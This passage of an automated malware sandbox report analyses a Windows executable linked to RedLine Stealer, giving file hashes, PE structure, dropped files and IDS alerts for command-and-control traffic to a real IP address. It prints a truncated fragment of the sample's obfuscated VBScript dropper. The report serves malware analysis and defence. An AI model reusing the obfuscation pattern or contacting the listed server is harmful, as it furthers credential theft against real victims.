                                                                    SSDEEP:384:0Ud4S9hu91w5j4fe0zmVFaMGVOBZnKSVPJmxNSiMFpWY:0E/LewWXzmVFaFVqZK+W2T
                                                                    MD5:85984861EFF636EB9F333FA3FA2D51AE
                                                                    SHA1:F6FA4C8AC4D0BC005530D01293FA5B6C7C28EC50
                                                                    SHA-256:E5BC3BDE1C727E31CBE1C230A015E3CB2585D005E638BC4ED8AB6628000FE19D
                                                                    SHA-512:297BF23612E3231F680C1676F6A33F64618428A38389B0AEF1BE9126EE48BCE50C225A69707149FF850F59173532CD1B5994113B0A971AAEAEE06A2CEFA1A06E
                                                                    Malicious:true
                                                                    Preview: 'g..aoamjrckfSi = rRegisggfgtertehkggns2211 & ""..Call Uglisging("")..Call Uglisging("")..Call Uglisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#G")..Call Uglisging("k#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d")..rfgfomIfI = LenB("dAbdicbdF")..Const SkSghpa = "kmmSSdhj"..'ncekdcFIg mmiopcc..hdgghIj = LenB("Fkfckggd")..Const SpkgfFi = "iIcAkdmf"..'jmIjpema bdrhana..emarmIAhm = LenB("eAjnejbo")..Const jkmgFmko = "mpoknoi"..'dIFjkbkkk mAekISdp..IcFnrIhki = LenB("chdhFgoo")..Call Uglisging("#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy")..Const odhajnr = "SiISkSdnd"..'SrkrdcS oIhAhhdp..pocedmp = LenB("hndohShS")..Const igdhidmFI = "mdIgcojkf"..'dibFpihi iFnfIafIA..pnSIkdk = LenB("hkiIhfAIA")..Const cmSAmkjaa = "IAimrdnnd"..'SFkkknin AaoadSI..hkdfmkS = LenB("cSIkFhmS")..Const oedcSmfk = "dknArjj"..Call Uglisging("#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N")..Call Uglisging("##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#b

                                                                    C:\Users\user\AppData\Local\Temp\Tmp24A4.tmp

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2662
                                                                    Entropy (8bit):7.8230547059446645
                                                                    Encrypted:false
                                                                    SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                    MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                    SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                    SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                    SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                    Malicious:false
                                                                    Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                                    C:\Users\user\AppData\Local\Temp\Tmp24C5.tmp

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2662
                                                                    Entropy (8bit):7.8230547059446645
                                                                    Encrypted:false
                                                                    SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                    MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                    SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                    SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                    SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                    Malicious:false
                                                                    Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0oado0gh.fjl.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_110bzeks.k3h.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nwjw335.j5w.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baonfytu.a2s.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nz3a2pbi.0k1.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5vu10dz.2zh.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2251
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:0158FE9CEAD91D1B027B795984737614
                                                                    SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                    SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                    SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.869975424944922
                                                                    TrID:
                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:sRMytgfRpJ.exe
                                                                    File size:165'376 bytes
                                                                    MD5:51c009abf871216f8d9e40cdd785ce6c
                                                                    SHA1:54bb04f21150f5706a3171847d3de9851cafcccf
                                                                    SHA256:9754bc10564077425803459cc91b0197ad96263e6994e9afc2a5fd0e932615d8
                                                                    SHA512:9df0d599f2dd954e235cb7949b85f3035dfcd7ac8920c5fe14797f29c8d5d6d8d1b0a70e02f10db93255c5200ab9b7c5ed6fca86783d507d883b7be6485c3797
                                                                    SSDEEP:3072:xahKyd2n31q5GWp1icKAArDZz4N9GhbkrNEk11/cWQKCT:xahO6p0yN90QEoBS
                                                                    TLSH:BEF38D1A63F420A6E4BA577498F202939A32BCB15B7586FF12C4D57E0E336C0A532F17
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

                                                                    File Icon

                                                                    Icon Hash:3b6120282c4c5a1f

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x140008200
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:10
                                                                    OS Version Minor:0
                                                                    File Version Major:10
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:10
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    call 00007FBD0926E4B0h
                                                                    dec eax
                                                                    add esp, 28h
                                                                    jmp 00007FBD0926DD5Bh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    dec eax
                                                                    mov dword ptr [esp+08h], ebx
                                                                    dec eax
                                                                    mov dword ptr [esp+10h], edi
                                                                    inc ecx
                                                                    push esi
                                                                    dec eax
                                                                    sub esp, 000000B0h
                                                                    and dword ptr [esp+20h], 00000000h
                                                                    dec eax
                                                                    lea ecx, dword ptr [esp+40h]
                                                                    call dword ptr [000011CDh]
                                                                    nop
                                                                    dec eax
                                                                    mov eax, dword ptr [00000030h]
                                                                    dec eax
                                                                    mov ebx, dword ptr [eax+08h]
                                                                    xor edi, edi
                                                                    xor eax, eax
                                                                    dec eax
                                                                    cmpxchg dword ptr [00004922h], ebx
                                                                    je 00007FBD0926DD5Ch
                                                                    dec eax
                                                                    cmp eax, ebx
                                                                    jne 00007FBD0926DD6Ch
                                                                    mov edi, 00000001h
                                                                    mov eax, dword ptr [00004918h]
                                                                    cmp eax, 01h
                                                                    jne 00007FBD0926DD69h
                                                                    lea ecx, dword ptr [eax+1Eh]
                                                                    call 00007FBD0926E343h
                                                                    jmp 00007FBD0926DDCCh
                                                                    mov ecx, 000003E8h
                                                                    call dword ptr [0000117Eh]
                                                                    jmp 00007FBD0926DD19h
                                                                    mov eax, dword ptr [000048F6h]
                                                                    test eax, eax
                                                                    jne 00007FBD0926DDABh
                                                                    mov dword ptr [000048E8h], 00000001h
                                                                    dec esp
                                                                    lea esi, dword ptr [000013E9h]
                                                                    dec eax
                                                                    lea ebx, dword ptr [000013CAh]
                                                                    dec eax
                                                                    mov dword ptr [esp+30h], ebx
                                                                    mov dword ptr [esp+24h], eax
                                                                    dec ecx
                                                                    cmp ebx, esi
                                                                    jnc 00007FBD0926DD77h
                                                                    test eax, eax
                                                                    jne 00007FBD0926DD77h
                                                                    dec eax
                                                                    cmp dword ptr [ebx], 00000000h
                                                                    je 00007FBD0926DD62h
                                                                    dec eax
                                                                    mov eax, dword ptr [ebx]
                                                                    dec eax
                                                                    mov ecx, dword ptr [00001388h]

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1d530.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d0000x20.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xf0000x1e0000x1d600bd56424859de998f0d17ce8c06b61aacFalse0.7439744015957447data7.068583798611468IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x2d0000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                    RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                    RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                    RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                    RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                    RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                    RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                    RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                    RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                    RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                    RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                    RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                    RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                    RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                    RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
                                                                    RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
                                                                    RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
                                                                    RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
                                                                    RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
                                                                    RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
                                                                    RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                                    RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
                                                                    RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
                                                                    RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
                                                                    RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
                                                                    RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
                                                                    RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                    RT_RCDATA0x298700x1f8eMicrosoft Cabinet archive data, Windows 2000/XP setup, 8078 bytes, 1 file, at 0x2c +A "fqt.vbs", ID 708, number 1, 1 datablock, 0x1503 compressionEnglishUnited States1.0013617231988117
                                                                    RT_RCDATA0x2b8000x4dataEnglishUnited States3.0
                                                                    RT_RCDATA0x2b8040x24Matlab v4 mat-file (little endian) , rows 18, columns 18, imaginaryEnglishUnited States0.7777777777777778
                                                                    RT_RCDATA0x2b8280x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                    RT_RCDATA0x2b8300x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                    RT_RCDATA0x2b8380x4dataEnglishUnited States3.0
                                                                    RT_RCDATA0x2b83c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                    RT_RCDATA0x2b8440x4dataEnglishUnited States3.0
                                                                    RT_RCDATA0x2b8480x13ASCII text, with no line terminatorsEnglishUnited States1.4210526315789473
                                                                    RT_RCDATA0x2b85c0x4dataEnglishUnited States3.0
                                                                    RT_RCDATA0x2b8600x13ASCII text, with no line terminatorsEnglishUnited States1.4210526315789473
                                                                    RT_RCDATA0x2b8740x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                    RT_RCDATA0x2b87c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                    RT_GROUP_ICON0x2b8840xbcdataEnglishUnited States0.6117021276595744
                                                                    RT_VERSION0x2b9400x408dataEnglishUnited States0.42151162790697677
                                                                    RT_MANIFEST0x2bd480x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                                                                    Imports

                                                                    DLLImport
                                                                    ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                    KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                                    GDI32.dllGetDeviceCaps
                                                                    USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                                    msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                                    COMCTL32.dll
                                                                    Cabinet.dll
                                                                    VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-09-26T12:16:25.187281+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1185.199.109.133443192.168.2.449730TCP
                                                                    2024-09-26T12:16:33.921234+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.449739185.196.9.266302TCP
                                                                    2024-09-26T12:16:33.921234+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.449739185.196.9.266302TCP
                                                                    2024-09-26T12:16:34.112551+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.196.9.266302192.168.2.449739TCP
                                                                    2024-09-26T12:16:39.174086+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.449739185.196.9.266302TCP
                                                                    2024-09-26T12:16:41.155211+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.196.9.266302192.168.2.449739TCP
